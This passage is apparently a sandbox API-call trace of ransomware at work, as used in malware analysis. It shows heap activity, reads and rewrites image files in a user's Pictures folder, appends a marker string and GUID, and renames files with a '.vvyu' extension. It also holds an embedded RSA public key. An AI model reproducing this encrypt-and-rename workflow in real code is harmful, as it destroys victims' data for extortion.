hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af31e0 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3228 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.471] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dcd0 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.474] GetCurrentThreadId () returned 0x5d8 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4e78 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.475] GetCurrentThreadId () returned 0x5d8 [0190.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dce8 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3228 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.486] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x17ca0, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x17ca0, lpOverlapped=0x0) returned 1 [0190.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.487] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17ca5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.487] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.488] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.489] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.489] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.489] CloseHandle (hObject=0x584) returned 1 [0190.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0190.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0190.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0190.491] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Br-Ix6cU0omQu4 DZyj.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\br-ix6cu0omqu4 dzyj.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Br-Ix6cU0omQu4 DZyj.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\br-ix6cu0omqu4 dzyj.png.vvyu")) returned 1 [0190.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.492] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0190.495] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x255495e0, ftCreationTime.dwHighDateTime=0x1d89ded, ftLastAccessTime.dwLowDateTime=0x74d95620, ftLastAccessTime.dwHighDateTime=0x1d89ed6, ftLastWriteTime.dwLowDateTime=0x74d95620, ftLastWriteTime.dwHighDateTime=0x1d89ed6, nFileSizeHigh=0x0, nFileSizeLow=0xc04f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cbyFXHxALB9ISR--Iyv1.png", cAlternateFileName="CBYFXH~1.PNG")) returned 1 [0190.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3228 [0190.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3228 | out: hHeap=0x2c0000) returned 1 [0190.495] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\cbyFXHxALB9ISR--Iyv1.png") returned=".png" [0190.495] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\cbyFXHxALB9ISR--Iyv1.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cbyfxhxalb9isr--iyv1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.495] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=49231) returned 1 [0190.495] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.498] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc029, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.498] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.501] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.501] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc04f, lpOverlapped=0x0) returned 1 [0190.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.502] lstrlenA (lpString="-----BEGIN PUBLIC 